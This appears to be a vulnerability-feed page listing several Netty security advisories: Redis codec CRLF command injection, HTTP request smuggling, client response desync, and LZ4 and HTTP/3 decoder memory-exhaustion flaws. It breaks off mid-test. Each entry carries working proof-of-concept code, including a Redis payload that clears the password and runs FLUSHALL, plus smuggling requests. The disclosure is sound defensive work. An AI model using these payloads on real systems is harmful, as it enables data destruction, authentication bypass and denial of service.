💬 # Security Vulnerability Report: CRLF Injection in Netty Redis Codec Encoder ## 1. Vulnerability Summary | Field | Value | |-------|-------| | **Product** | Netty | | **Version** | 4.2.12.Final (and all prior versions with codec-redis) | | **Component** | `io.netty.handler.code...
📅 2026-05-07 OSV/Maven 🔗 التفاصيل

الوصف الكامل

# Security Vulnerability Report: CRLF Injection in Netty Redis Codec Encoder ## 1. Vulnerability Summary | Field | Value | |-------|-------| | **Product** | Netty | | **Version** | 4.2.12.Final (and all prior versions with codec-redis) | | **Component** | `io.netty.handler.codec.redis.RedisEncoder` | | **Vulnerability Type** | CWE-93: Improper Neutralization of CRLF Sequences (CRLF Injection) | | **Impact** | Redis Command Injection / Response Poisoning | | **Attack Vector** | Network | | **Attack Complexity** | Low | | **Privileges Required** | None | | **User Interaction** | None | | **Scope** | Unchanged | | **Confidentiality Impact** | High | | **Integrity Impact** | High | | **Availability Impact** | None | ## 2. Affected Components The following classes in the `codec-redis` module are affected: - `io.netty.handler.codec.redis.RedisEncoder` (encoder - no output validation) - `io.netty.handler.codec.redis.InlineCommandRedisMessage` (no input validation) - `io.netty.handler.codec.redis.SimpleStringRedisMessage` (no input validation) - `io.netty.handler.codec.redis.ErrorRedisMessage` (no input validation) - `io.netty.handler.codec.redis.AbstractStringRedisMessage` (base class - no validation) ## 3. Vulnerability Description The Netty Redis codec encoder (`RedisEncoder`) writes user-controlled string content directly to the network output buffer without validating or sanitizing CRLF (`\r\n`) characters. Since the Redis Serialization Protocol (RESP) uses CRLF as the command/response delimiter, an attacker who can control the content of a Redis message can inject arbitrary Redis commands or forge fake responses. ### Root Cause In `RedisEncoder.java`, the `writeString()` method (lines 103-111) writes content using `ByteBufUtil.writeUtf8()` without any validation: ```java private static void writeString(ByteBufAllocator allocator, RedisMessageType type, String content, List<Object> out) { ByteBuf buf = allocator.ioBuffer(type.length() + ByteBufUtil.utf8MaxBytes(content) + RedisConstants.EOL_LENGTH); type.writeTo(buf); ByteBufUtil.writeUtf8(buf, content); // <-- NO CRLF VALIDATION buf.writeShort(RedisConstants.EOL_SHORT); // <-- Appends \r\n out.add(buf); } ``` The message constructors (`InlineCommandRedisMessage`, `SimpleStringRedisMessage`, `ErrorRedisMessage`) inherit from `AbstractStringRedisMessage`, which only checks for null: ```java // AbstractStringRedisMessage.java:30-32 AbstractStringRedisMessage(String content) { this.content = ObjectUtil.checkNotNull(content, "content"); // NO CRLF validation } ``` ### Comparison with Similar Fixed CVEs This vulnerability follows the exact same pattern as two previously acknowledged Netty CVEs: | CVE | Component | Fix | |-----|-----------|-----| | **GHSA-jq43-27x9-3v86** | SmtpRequestEncoder - SMTP command injection | Added `SmtpUtils.validateSMTPParameters()` to check for `\r` and `\n` | | **GHSA-84h7-rjj3-6jx4** | HttpRequestEncoder - CRLF in URI | Added `HttpUtil.validateRequestLineTokens()` to check for `\r`, `\n`, and SP | The Redis codec has **no equivalent validation** in either the encoder or the message constructors. ## 4. Exploitability Prerequisites This vulnerability is exploitable when **all** of the following conditions are met: 1. The application uses Netty's `codec-redis` module to communicate with a Redis server 2. User-controlled input is placed into `InlineCommandRedisMessage`, `SimpleStringRedisMessage`, or `ErrorRedisMessage` content 3. The application does **not** perform its own CRLF sanitization before constructing these message objects **Important context**: Most production Redis clients built on Netty use the RESP array format (`ArrayRedisMessage` + `BulkStringRedisMessage`), which uses binary-safe length-prefixed encoding and is **not** affected by this vulnerability. The vulnerability specifically affects the text-based inline command mode and simple string/error response types, which use CRLF as protocol delimiters. **Affected use cases include**: - Custom Redis clients or proxies that use `InlineCommandRedisMessage` for simplicity - Redis middleware/proxy layers that forward `SimpleStringRedisMessage` or `ErrorRedisMessage` responses - Applications that construct Redis monitoring or diagnostic commands from user input - Redis Sentinel or Cluster management tools using inline command format ## 5. Attack Scenarios ### Scenario 1: Redis Command Injection via Inline Commands When Netty is used as a Redis client or proxy, and user-controlled data is placed into `InlineCommandRedisMessage`, an attacker can inject arbitrary Redis commands: ```java // Application code that builds Redis commands from user input String userKey = request.getParameter("key"); // Attacker controls this InlineCommandRedisMessage msg = new InlineCommandRedisMessage("GET " + userKey); channel.writeAndFlush(msg); ``` **Attack input**: `key = "foo\r\nCONFIG SET requirepass \"\"\r\nFLUSHALL"` **Result**: Three commands sent to Redis: 1. `GET foo` 2. `CONFIG SET requirepass ""` (removes authentication!) 3. `FLUSHALL` (deletes all data!) ### Scenario 2: Redis Response Poisoning When Netty is used as a Redis proxy/middleware, a malicious upstream Redis server (or MITM attacker) can inject fake responses: ```java // Proxy forwarding a simple string response SimpleStringRedisMessage response = new SimpleStringRedisMessage(upstreamResponse); downstreamChannel.writeAndFlush(response); ``` **Malicious upstream response**: `"OK\r\n$6\r\nhacked"` **Client sees**: 1. Simple String: `+OK` (expected response) 2. Bulk String: `$6\r\nhacked` (injected fake data!) ### Scenario 3: Error Message Injection ```java ErrorRedisMessage error = new ErrorRedisMessage("ERR " + errorDetail); ``` **Attack input**: `errorDetail = "unknown\r\n+FAKE_SUCCESS"` **Client sees**: 1. Error: `-ERR unknown` 2. Simple String: `+FAKE_SUCCESS` (injected fake success!) ## 6. Proof of Concept ### Full Runnable PoC Source Code (RedisEncoderCRLFInjectionPoC.java) ```java import io.netty.buffer.ByteBuf; import io.netty.buffer.ByteBufUtil; import io.netty.buffer.UnpooledByteBufAllocator; import io.netty.channel.ChannelHandlerContext; import io.netty.channel.embedded.EmbeddedChannel; import io.netty.handler.codec.redis.*; import java.nio.charset.StandardCharsets; import java.util.List; import java.util.ArrayList; /** * PoC: Redis Encoder CRLF Injection Vulnerability * * Demonstrates that InlineCommandRedisMessage, SimpleStringRedisMessage, * and ErrorRedisMessage do not validate content for CRLF characters, * allowing Redis command injection via the RESP protocol. */ public class RedisEncoderCRLFInjectionPoC { public static void main(String[] args) { System.out.println("=== Netty Redis Encoder CRLF Injection PoC ===\n"); testInlineCommandInjection(); testSimpleStringInjection(); testErrorMessageInjection(); System.out.println("\n=== PoC Complete ==="); } /** * Test 1: Inline Command Injection * An attacker-controlled string injected into InlineCommandRedisMessage * results in multiple Redis commands being sent. */ static void testInlineCommandInjection() { System.out.println("[TEST 1] Inline Command CRLF Injection"); System.out.println("----------------------------------------"); // Malicious content: inject FLUSHALL after a benign PING String maliciousContent = "PING\r\nCONFIG SET requirepass \"\"\r\nFLUSHALL"; EmbeddedChannel channel = new EmbeddedChannel(new RedisEncoder()); // This should be rejected but is accepted InlineCommandRedisMessage msg = new InlineCommandRedisMessage(maliciousContent); channel.writeOutbound(msg); ByteBuf output = channel.readOutbound(); String encoded = output.toString(StandardCharsets.UTF_8); output.release(); channel.finishAndReleaseAll(); System.out.println("Input: InlineCommandRedisMessage(\"" + maliciousContent.replace("\r", "\\r").replace("\n", "\\n") + "\")"); System.out.println("Encoded: \"" + encoded.replace("\r", "\\r").replace("\n", "\\n") + "\""); // Count how many CRLF-delimited commands are in the output String[] commands = encoded.split("\r\n"); System.out.println("Number of commands parsed by Redis: " + commands.length); for (int i = 0; i < commands.length; i++) { if (!commands[i].isEmpty()) { System.out.println(" Command " + (i + 1) + ": " + commands[i]); } } boolean vulnerable = commands.length > 1; System.out.println("VULNERABLE: " + (vulnerable ? "YES - Multiple commands injected!" : "NO")); System.out.println(); } /** * Test 2: SimpleString Response Injection * When Netty acts as a Redis proxy/middleware, a malicious SimpleString * can inject fake responses to the downstream client. */ static void testSimpleStringInjection() { System.out.println("[TEST 2] SimpleString Response CRLF Injection"); System.out.println("----------------------------------------------"); // Malicious content: inject a fake bulk string response after OK String maliciousContent = "OK\r\n$6\r\nhacked"; EmbeddedChannel channel = new EmbeddedChannel(new RedisEncoder()); SimpleStringRedisMessage msg = new SimpleStringRedisMessage(maliciousContent); channel.writeOutbound(msg); ByteBuf output = channel.readOutbound(); String encoded = output.toString(StandardCharsets.UTF_8); output.release(); channel.finishAndReleaseAll(); System.out.println("Input: SimpleStringRedisMessage(\"" + maliciousContent.replace("\r", "\\r").replace("\n", "\\n") + "\")"); System.out.println("Encoded: \"" + encoded.replace("\r", "\\r").replace("\n", "\\n") + "\""); // The RESP protocol uses the first byte to determine type: // '+' = Simple String, '$' = Bulk String // A client parsing this would see: // 1. "+OK\r\n" -> Simple String "OK" // 2. "$6\r\nhacked" -> Bulk String "hacked" (injected!) boolean vulnerable = encoded.contains("+OK\r\n$6\r\nhacked"); System.out.println("VULNERABLE: " + (vulnerable ? "YES - Response poisoning possible!" : "NO")); System.out.println(); } /** * Test 3: Error Message Injection * Similar to SimpleString but with error messages. */ static void testErrorMessageInjection() { System.out.println("[TEST 3] Error Message CRLF Injection"); System.out.println("--------------------------------------"); String maliciousContent = "ERR unknown\r\n+INJECTED_OK"; EmbeddedChannel channel = new EmbeddedChannel(new RedisEncoder()); ErrorRedisMessage msg = new ErrorRedisMessage(maliciousContent); channel.writeOutbound(msg); ByteBuf output = channel.readOutbound(); String encoded = output.toString(StandardCharsets.UTF_8); output.release(); channel.finishAndReleaseAll(); System.out.println("Input: ErrorRedisMessage(\"" + maliciousContent.replace("\r", "\\r").replace("\n", "\\n") + "\")"); System.out.println("Encoded: \"" + encoded.replace("\r", "\\r").replace("\n", "\\n") + "\""); boolean vulnerable = encoded.contains("-ERR unknown\r\n+INJECTED_OK"); System.out.println("VULNERABLE: " + (vulnerable ? "YES - Error + fake OK injected!" : "NO")); System.out.println(); } } ``` ### How to Compile and Run ```bash # Build Netty (skip tests for speed) ./mvnw install -pl common,buffer,codec,codec-redis,transport -DskipTests -Dcheckstyle.skip=true \ -Denforcer.skip=true -Djapicmp.skip=true -Danimal.sniffer.skip=true \ -Drevapi.skip=true -Dforbiddenapis.skip=true -Dspotbugs.skip=true -q # Set classpath JARS=$(find ~/.m2/repository/io/netty -name "netty-*.jar" -path "*/4.2.12.Final/*" \ | grep -v sources | grep -v javadoc | tr '\n' ':') # Compile and run javac -cp "$JARS" RedisEncoderCRLFInjectionPoC.java java -cp "$JARS:." RedisEncoderCRLFInjectionPoC ``` ### PoC Execution Output (Verified on Netty 4.2.12.Final) ``` === Netty Redis Encoder CRLF Injection PoC === [TEST 1] Inline Command CRLF Injection ---------------------------------------- Input: InlineCommandRedisMessage("PING\r\nCONFIG SET requirepass ""\r\nFLUSHALL") Encoded: "PING\r\nCONFIG SET requirepass ""\r\nFLUSHALL\r\n" Number of commands parsed by Redis: 3 Command 1: PING Command 2: CONFIG SET requirepass "" Command 3: FLUSHALL VULNERABLE: YES - Multiple commands injected! [TEST 2] SimpleString Response CRLF Injection ---------------------------------------------- Input: SimpleStringRedisMessage("OK\r\n$6\r\nhacked") Encoded: "+OK\r\n$6\r\nhacked\r\n" VULNERABLE: YES - Response poisoning possible! [TEST 3] Error Message CRLF Injection -------------------------------------- Input: ErrorRedisMessage("ERR unknown\r\n+INJECTED_OK") Encoded: "-ERR unknown\r\n+INJECTED_OK\r\n" VULNERABLE: YES - Error + fake OK injected! === PoC Complete === ``` ## 7. Impact Analysis | Impact Category | Description | |----------------|-------------| | **Confidentiality** | HIGH - Attacker can execute `CONFIG GET` to extract sensitive Redis configuration, use `KEYS *` to enumerate all data | | **Integrity** | HIGH - Attacker can execute `SET`/`DEL`/`FLUSHALL` to modify or destroy data, `CONFIG SET` to change server configuration | | **Availability** | Can be HIGH - `FLUSHALL` destroys all data, `SHUTDOWN` stops the server, `DEBUG SLEEP` causes DoS | | **Authentication Bypass** | `CONFIG SET requirepass ""` removes authentication | | **Data Exfiltration** | Lua scripting via `EVAL` enables complex data extraction | ## 8. Remediation Recommendations ### Option 1: Validate in Message Constructors (Recommended) Add CRLF validation to `AbstractStringRedisMessage`: ```java AbstractStringRedisMessage(String content) { this.content = ObjectUtil.checkNotNull(content, "content"); validateContent(content); } private static void validateContent(String content) { for (int i = 0; i < content.length(); i++) { char c = content.charAt(i); if (c == '\r' || c == '\n') { throw new IllegalArgumentException( "Redis message content contains illegal CRLF character at index " + i); } } } ``` ### Option 2: Validate in Encoder (Defense-in-Depth) Add validation in `RedisEncoder.writeString()`: ```java private static void writeString(ByteBufAllocator allocator, RedisMessageType type, String content, List<Object> out) { for (int i = 0; i < content.length(); i++) { char c = content.charAt(i); if (c == '\r' || c == '\n') { throw new RedisCodecException( "Redis message content contains CRLF at index " + i); } } // ... existing encoding logic } ``` ### Option 3: Both (Best Practice) Apply validation in both the constructor and the encoder, following the pattern used for SMTP: - `SmtpUtils.validateSMTPParameters()` validates in `DefaultSmtpRequest` constructor - This provides defense-in-depth against custom `SmtpRequest` implementations ## 9. Resources - [RESP Protocol Specification](https://redis.io/docs/reference/protocol-spec/) - [CWE-93: Improper Neutralization of CRLF Sequences](https://cwe.mitre.org/data/definitions/93.html) - [GHSA-jq43-27x9-3v86: Netty SMTP Command Injection](https://github.com/netty/netty/security/advisories/GHSA-jq43-27x9-3v86) - [GHSA-84h7-rjj3-6jx4: Netty HTTP CRLF Injection](https://github.com/netty/netty/security/advisories/GHSA-84h7-rjj3-6jx4)

الإصدارات المتأثرة

4.2.0.Alpha1, 4.2.0.Alpha2, 4.2.0.Alpha3, 4.2.0.Alpha4, 4.2.0.Alpha5

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N

غير محدد
📦 io.netty:netty-codec-http 📌 4.2.0.Alpha1, 4.2.0.Alpha2, 4.2.0.Alpha3, 4.2.0.Alpha4, 4.2.0.Alpha5 ⛓️‍💥 هجوم سلسلة التوريد ☕ مكتبة Java Maven 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Summary Netty incorrectly parses malformed Transfer-Encoding, enabling request smuggling attacks. ### Details Netty incorrectly marks a request as chunked when malformed "Transfer-Encoding: chunked, identity" is present. According to RFC https://datatracker.ietf.org/doc/html...
📅 2026-05-07 OSV/Maven 🔗 التفاصيل

الوصف الكامل

### Summary Netty incorrectly parses malformed Transfer-Encoding, enabling request smuggling attacks. ### Details Netty incorrectly marks a request as chunked when malformed "Transfer-Encoding: chunked, identity" is present. According to RFC https://datatracker.ietf.org/doc/html/rfc9112#name-message-body-length " If a Transfer-Encoding header field is present in a request and the chunked transfer coding is not the final encoding, the message body length cannot be determined reliably; the server MUST respond with the 400 (Bad Request) status code and then close the connection. " A possible scenario is when Netty is behind a proxy that doesn't reject requests with "Transfer-Encoding: chunked, identity", but prefers "Content-Length" and forwards the content to Netty. ### PoC The test below shows Netty successfully parsing the second request, demonstrating how an attacker can smuggle a second request inside a request body. ```java @Test public void test() { String requestStr = "POST / HTTP/1.1\r\n" + "Host: localhost\r\n" + "Transfer-Encoding: chunked, identity\r\n" + "Content-Length: 48\r\n" + "\r\n" + "0\r\n" + "\r\n" + "GET /smuggled HTTP/1.1\r\n" + "Host: localhost\r\n" + "\r\n"; EmbeddedChannel channel = new EmbeddedChannel(new HttpRequestDecoder()); assertTrue(channel.writeInbound(Unpooled.copiedBuffer(requestStr, CharsetUtil.US_ASCII))); // Request 1 HttpRequest request = channel.readInbound(); assertTrue(request.decoderResult().isSuccess()); assertTrue(request.headers().contains("Transfer-Encoding")); assertFalse(request.headers().contains("Content-Length")); LastHttpContent last = channel.readInbound(); assertTrue(last.decoderResult().isSuccess()); last.release(); // Request 2 request = channel.readInbound(); assertTrue(request.decoderResult().isSuccess()); last = channel.readInbound(); assertTrue(last.decoderResult().isSuccess()); last.release(); } ``` ### Impact HTTP Request Smuggling: Attacker injects arbitrary HTTP requests

الإصدارات المتأثرة

4.2.0.Alpha1, 4.2.0.Alpha2, 4.2.0.Alpha3, 4.2.0.Alpha4, 4.2.0.Alpha5

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

عالية
📦 io.netty:netty-codec-http 📌 4.2.0.Alpha1, 4.2.0.Alpha2, 4.2.0.Alpha3, 4.2.0.Alpha4, 4.2.0.Alpha5 ⛓️‍💥 هجوم سلسلة التوريد ☕ مكتبة Java Maven 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Summary If HttpClientCodec is configured, there are use cases when a response body from one request, can be parsed as another's. ### Details HttpClientCodec pairs each inbound response with an outbound request by `queue.poll()` once per response, including for `1xx`. If the...
📅 2026-05-07 OSV/Maven 🔗 التفاصيل

الوصف الكامل

### Summary If HttpClientCodec is configured, there are use cases when a response body from one request, can be parsed as another's. ### Details HttpClientCodec pairs each inbound response with an outbound request by `queue.poll()` once per response, including for `1xx`. If the client pipelines GET then HEAD and the server sends 103, then 200 with GET body, then 200 for HEAD, the queue pairs HEAD with the first 200. The HEAD rule then skips reading that message’s body, so the GET entity bytes stay on the stream and the following 200 is parsed from the wrong offset. Prerequisites - HTTP/1.1 pipelining - HEAD in the pipeline - The server sends 1xx ### PoC ```java @Test public void test() { EmbeddedChannel channel = new EmbeddedChannel(new HttpClientCodec()); assertTrue(channel.writeOutbound(new DefaultFullHttpRequest(HttpVersion.HTTP_1_1, HttpMethod.GET, "/1"))); ByteBuf request = channel.readOutbound(); request.release(); assertNull(channel.readOutbound()); assertTrue(channel.writeOutbound(new DefaultFullHttpRequest(HttpVersion.HTTP_1_1, HttpMethod.HEAD, "/2"))); request = channel.readOutbound(); request.release(); assertNull(channel.readOutbound()); String responseStr = "HTTP/1.1 103 Early Hints\r\n\r\n" + "HTTP/1.1 200 OK\r\nContent-Length: 5\r\n\r\nhello" + "HTTP/1.1 200 OK\r\n\r\n"; assertTrue(channel.writeInbound(Unpooled.copiedBuffer(responseStr, CharsetUtil.US_ASCII))); // Response 1 HttpResponse response = channel.readInbound(); assertEquals(HttpResponseStatus.EARLY_HINTS, response.status()); LastHttpContent last = channel.readInbound(); assertEquals(0, last.content().readableBytes()); last.release(); // Response 2 response = channel.readInbound(); assertEquals(HttpResponseStatus.OK, response.status()); last = channel.readInbound(); assertEquals(0, last.content().readableBytes()); last.release(); // Response 3 FullHttpResponse response1 = channel.readInbound(); assertTrue(response1.decoderResult().isFailure()); assertEquals(0, response1.content().readableBytes()); response1.release(); assertFalse(channel.finish()); } ``` ### Impact Integrity/availability of HTTP parsing on that connection, unsafe reuse of the socket.

الإصدارات المتأثرة

4.2.0.Alpha1, 4.2.0.Alpha2, 4.2.0.Alpha3, 4.2.0.Alpha4, 4.2.0.Alpha5

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

عالية
📦 io.netty:netty-codec-compression 📌 4.2.0.Alpha3, 4.2.0.Alpha4, 4.2.0.Alpha5, 4.2.0.Beta1, 4.2.0.Final ⛓️‍💥 هجوم سلسلة التوريد ☕ مكتبة Java Maven 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Summary Lz4FrameDecoder allocates a ByteBuf of size `decompressedLength` (up to 32 MB per block) before LZ4 runs. A peer only needs a 21-byte header plus `compressedLength` payload bytes - 22 bytes if `compressedLength == 1` - to force that allocation. ### Details io.netty.h...
📅 2026-05-07 OSV/Maven 🔗 التفاصيل

الوصف الكامل

### Summary Lz4FrameDecoder allocates a ByteBuf of size `decompressedLength` (up to 32 MB per block) before LZ4 runs. A peer only needs a 21-byte header plus `compressedLength` payload bytes - 22 bytes if `compressedLength == 1` - to force that allocation. ### Details io.netty.handler.codec.compression.Lz4FrameDecoder#decode Header fields are trusted for sizing. On the compressed path, after `readableBytes >= compressedLength`, the decoder does `ctx.alloc().buffer(decompressedLength, decompressedLength)` then decompresses. ### PoC The test below demonstrates how an attacker sending 22 bytes will force the server to allocate 32MB ```java @Test void test() throws Exception { EventLoopGroup workerGroup = new MultiThreadIoEventLoopGroup(NioIoHandler.newFactory()); try { AtomicReference<Throwable> serverError = new AtomicReference<>(); CountDownLatch latch = new CountDownLatch(1); ServerBootstrap server = new ServerBootstrap() .group(workerGroup) .channel(NioServerSocketChannel.class) .childHandler(new ChannelInitializer<SocketChannel>() { @Override protected void initChannel(SocketChannel ch) { ch.pipeline() .addLast(new Lz4FrameDecoder()) .addLast(new ChannelInboundHandlerAdapter() { @Override public void exceptionCaught(ChannelHandlerContext ctx, Throwable cause) { if (cause instanceof DecoderException) { serverError.set(cause.getCause()); } else { serverError.set(cause); } latch.countDown(); } }); } }); ChannelFuture serverChannel = server.bind(0).sync(); Bootstrap client = new Bootstrap() .group(workerGroup) .channel(NioSocketChannel.class) .handler(new ChannelInboundHandlerAdapter() { @Override public void channelActive(ChannelHandlerContext ctx) { ByteBuf buf = ctx.alloc().buffer(22, 22); buf.writeLong(MAGIC_NUMBER); buf.writeByte(BLOCK_TYPE_COMPRESSED | 0x0F); buf.writeIntLE(1); buf.writeIntLE(1 << 25); buf.writeIntLE(0); buf.writeByte(0); ctx.writeAndFlush(buf); ctx.fireChannelActive(); } }); ChannelFuture clientChannel = client.connect(serverChannel.channel().localAddress()).sync(); assertTrue(latch.await(10, TimeUnit.SECONDS)); assertInstanceOf(IndexOutOfBoundsException.class, serverError.get()); clientChannel.channel().close(); serverChannel.channel().close(); } finally { workerGroup.shutdownGracefully(); } } ``` ### Impact Untrusted senders without per-channel / aggregate limits can stress memory with many small requests.

الإصدارات المتأثرة

4.2.0.Alpha3, 4.2.0.Alpha4, 4.2.0.Alpha5, 4.2.0.Beta1, 4.2.0.Final

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

عالية
📦 io.netty:netty-codec-http3 📌 4.2.10.Final, 4.2.11.Final, 4.2.12.Final, 4.2.2.Final, 4.2.3.Final ⛓️‍💥 هجوم سلسلة التوريد ☕ مكتبة Java Maven 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Summary When Netty decodes HTTP/3 headers, it sometimes runs `new byte[length]` using a length from the wire before checking that many bytes are really there. A small malicious header can claim a huge length (on the order of a gigabyte). ### Details When decoding header bloc...
📅 2026-05-07 OSV/Maven 🔗 التفاصيل

الوصف الكامل

### Summary When Netty decodes HTTP/3 headers, it sometimes runs `new byte[length]` using a length from the wire before checking that many bytes are really there. A small malicious header can claim a huge length (on the order of a gigabyte). ### Details When decoding header blocks, the non-Huffman branch of `io.netty.handler.codec.http3.QpackDecoder#decodeHuffmanEncodedLiteral` may execute `new byte[length]` for a string literal before verifying that length bytes are actually present in the compressed field section. The wire encoding allows a very large length to be expressed in few bytes. There is no check that `length <= in.readableBytes()` before `new byte[length]`. ### PoC The test below constructs a small HTTP/3 HEADERS frame whose QPACK section decodes to a ~1 GiB non-Huffman name length and is used to observe server-side failure; it illustrates how little wire data can target `new byte[length]`. ```java @Test public void test() throws Exception { EventLoopGroup group = new MultiThreadIoEventLoopGroup(1, NioIoHandler.newFactory()); try { X509Bundle cert = new CertificateBuilder() .subject("cn=localhost") .setIsCertificateAuthority(true) .buildSelfSigned(); QuicSslContext serverContext = QuicSslContextBuilder.forServer(cert.toTempPrivateKeyPem(), null, cert.toTempCertChainPem()) .applicationProtocols(Http3.supportedApplicationProtocols()) .build(); AtomicReference<Throwable> serverErrors = new AtomicReference<>(); CountDownLatch serverConnectionClosed = new CountDownLatch(1); ChannelHandler serverCodec = Http3.newQuicServerCodecBuilder() .sslContext(serverContext) .maxIdleTimeout(5000, TimeUnit.MILLISECONDS) .initialMaxData(10_000_000) .initialMaxStreamDataBidirectionalLocal(1_000_000) .initialMaxStreamDataBidirectionalRemote(1_000_000) .initialMaxStreamsBidirectional(100) .tokenHandler(InsecureQuicTokenHandler.INSTANCE) .handler(new ChannelInitializer<QuicChannel>() { @Override protected void initChannel(QuicChannel ch) { ch.closeFuture().addListener(f -> serverConnectionClosed.countDown()); ch.pipeline().addLast(new Http3ServerConnectionHandler( new ChannelInboundHandlerAdapter() { @Override public void exceptionCaught(ChannelHandlerContext ctx, Throwable cause) { if (cause instanceof DecoderException) { serverErrors.set(cause.getCause()); } else { serverErrors.set(cause); } } })); } }) .build(); Channel server = new Bootstrap() .group(group) .channel(NioDatagramChannel.class) .handler(serverCodec) .bind("127.0.0.1", 0) .sync() .channel(); QuicSslContext clientContext = QuicSslContextBuilder.forClient() .trustManager(InsecureTrustManagerFactory.INSTANCE) .applicationProtocols(Http3.supportedApplicationProtocols()) .build(); ChannelHandler clientCodec = Http3.newQuicClientCodecBuilder() .sslContext(clientContext) .maxIdleTimeout(5000, TimeUnit.MILLISECONDS) .initialMaxData(10000000) .initialMaxStreamDataBidirectionalLocal(1000000) .build(); Channel client = new Bootstrap() .group(group) .channel(NioDatagramChannel.class) .handler(clientCodec) .bind(0) .sync() .channel(); QuicChannel quicChannel = QuicChannel.newBootstrap(client) .handler(new Http3ClientConnectionHandler()) .remoteAddress(server.localAddress()) .localAddress(client.localAddress()) .connect() .get(); QuicStreamChannel rawStream = quicChannel.createStream(QuicStreamType.BIDIRECTIONAL, new ChannelInboundHandlerAdapter()).get(); ByteBuf header = Unpooled.buffer(); header.writeByte(0x01); header.writeByte(0x08); header.writeByte(0x00); header.writeByte(0x00); header.writeByte(0x27); header.writeByte(0x80); header.writeByte(0x80); header.writeByte(0x80); header.writeByte(0x80); header.writeByte(0x04); rawStream.writeAndFlush(header).sync(); assertTrue(serverConnectionClosed.await(10, TimeUnit.SECONDS)); assertInstanceOf(IndexOutOfBoundsException.class, serverErrors.get()); quicChannel.closeFuture().await(5, TimeUnit.SECONDS); server.close().sync(); client.close().sync(); } finally { group.shutdownGracefully(); } } ``` ### Impact The server can slow down, stall, or crash under load when many crafted HTTP/3 HEADERS frames trigger very large `byte[]` allocations during QPACK literal decoding.

الإصدارات المتأثرة

4.2.10.Final, 4.2.11.Final, 4.2.12.Final, 4.2.2.Final, 4.2.3.Final

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

غير محدد
📦 io.netty:netty-codec-http 📌 4.2.0.Alpha1, 4.2.0.Alpha2, 4.2.0.Alpha3, 4.2.0.Alpha4, 4.2.0.Alpha5 ⛓️‍💥 هجوم سلسلة التوريد ☕ مكتبة Java Maven 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 # NETTY HTTP/1.0 TE+CL Coexistence Bypasses Smuggling Sanitization | Field | Value | |-----------|-------| | Library | `io.netty:netty-codec-http` | | Component | `codec-http` — `HttpObjectDecoder` | | Severity | **HIGH** | | Affects | HEAD, commit `4f3533ae` confirmed ...
📅 2026-05-07 OSV/Maven 🔗 التفاصيل

الوصف الكامل

# NETTY HTTP/1.0 TE+CL Coexistence Bypasses Smuggling Sanitization | Field | Value | |-----------|-------| | Library | `io.netty:netty-codec-http` | | Component | `codec-http` — `HttpObjectDecoder` | | Severity | **HIGH** | | Affects | HEAD, commit `4f3533ae` confirmed | --- ## Summary `HttpObjectDecoder` strips a conflicting `Content-Length` header when a request carries both `Transfer-Encoding: chunked` and `Content-Length`, but only for HTTP/1.1 messages. The guard is absent for HTTP/1.0. An attacker that sends an HTTP/1.0 request with both headers causes Netty to decode the body as chunked while leaving `Content-Length` intact in the forwarded `HttpMessage`. Any downstream proxy or handler that trusts `Content-Length` over `Transfer-Encoding` will disagree on message boundaries, enabling request smuggling. --- ## Root Cause ```java // HttpObjectDecoder.java:828-833 if (HttpUtil.isTransferEncodingChunked(message)) { this.chunked = true; if (!contentLengthFields.isEmpty() && message.protocolVersion() == HttpVersion.HTTP_1_1) { handleTransferEncodingChunkedWithContentLength(message); // strips CL — HTTP/1.1 only } return State.READ_CHUNK_SIZE; } // HttpObjectDecoder.java:870-873 protected void handleTransferEncodingChunkedWithContentLength(HttpMessage message) { message.headers().remove(HttpHeaderNames.CONTENT_LENGTH); contentLength = Long.MIN_VALUE; } ``` The conflict-resolution path is gated on `message.protocolVersion() == HttpVersion.HTTP_1_1`. When the request declares `HTTP/1.0`, the condition is false, `handleTransferEncodingChunkedWithContentLength` is never called, and the `Content-Length` header survives into the forwarded message. Netty still processes the body as chunked; a downstream component that is CL-first interprets the same bytes as a separate request. --- ## Proof of Concept ``` POST /api HTTP/1.0\r\n Host: internal.example.com\r\n Transfer-Encoding: chunked\r\n Content-Length: 0\r\n \r\n 5\r\n GPOST\r\n 0\r\n \r\n ``` Netty consumes the full chunked body (5 bytes + terminator). A downstream CL-first proxy reads `Content-Length: 0`, considers the request complete at the blank line, and treats `5\r\nGPOST\r\n0\r\n\r\n` as the start of a second request. --- ## Conditions Required 1. Netty is deployed behind a reverse proxy or load balancer that is `Content-Length`-first (nginx, some HAProxy configs, AWS ALB in certain modes). 2. Attacker can send HTTP/1.0 requests (either directly or by downgrading via connection manipulation). 3. No additional HTTP/1.0 stripping layer between attacker and Netty. --- ## Impact Request smuggling at the Netty edge. Allows cache poisoning, session fixation against other users, unauthorized access to internal endpoints, and bypassing of WAF or authentication layers that inspect only the first logical request. --- ## Confirmed PoC Test Verified against HEAD (`4f3533ae`) using `EmbeddedChannel`. Both tests pass, confirming the vulnerability and the HTTP/1.1 contrast. ```java package io.netty.handler.codec.http; import io.netty.buffer.Unpooled; import io.netty.channel.embedded.EmbeddedChannel; import io.netty.util.CharsetUtil; import org.junit.jupiter.api.Test; import static org.junit.jupiter.api.Assertions.*; public class NettySmugglingSec001Test { // VULNERABLE: Content-Length survives in HTTP/1.0 TE+CL conflict @Test public void http10_contentLengthNotStripped() { EmbeddedChannel ch = new EmbeddedChannel(new HttpRequestDecoder()); ch.writeInbound(Unpooled.copiedBuffer( "POST /api HTTP/1.0\r\n" + "Transfer-Encoding: chunked\r\n" + "Content-Length: 0\r\n" + "\r\n" + "5\r\nGPOST\r\n0\r\n\r\n", CharsetUtil.US_ASCII)); HttpRequest req = ch.readInbound(); assertEquals(HttpVersion.HTTP_1_0, req.protocolVersion()); // Content-Length: 0 survives — downstream CL-first proxy treats chunked body as new request assertNotNull(req.headers().get(HttpHeaderNames.CONTENT_LENGTH), "VULNERABLE: CL not stripped"); 